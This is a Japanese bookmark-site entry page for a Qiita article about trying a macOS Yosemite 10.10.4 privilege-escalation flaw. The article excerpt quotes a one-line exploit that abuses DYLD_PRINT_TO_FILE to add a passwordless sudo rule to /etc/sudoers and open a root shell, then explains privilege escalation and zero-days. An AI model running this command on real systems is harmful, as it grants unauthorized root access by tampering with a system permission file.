エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
Yosemite10.10.4で権限昇格のゼロデイを試してみる - Qiita
記事へのコメント0件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
Yosemite10.10.4で権限昇格のゼロデイを試してみる - Qiita
はじめに 6月頃から話題になってたようですが、早くも簡単に実行するコマンドがアップされていました。 ... はじめに 6月頃から話題になってたようですが、早くも簡単に実行するコマンドがアップされていました。 echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s # via reddit: numinit (shorter) — Stefan Esser (@i0n1c) 2015, 7月 22 権限昇格の脆弱性(Exploit)というのは、パスワードを回避して上級ユーザーにログインする感じのものを言います。今回のコマンドもそんな感じで、パスワード入力なしにsudo suが実行されます。 また、ここで言うゼロデイ(0day)というのは公式では修正されていない脆弱性、一般には知られていない脆弱性のことを言います。0dayだと、対象となるOS及びツールなど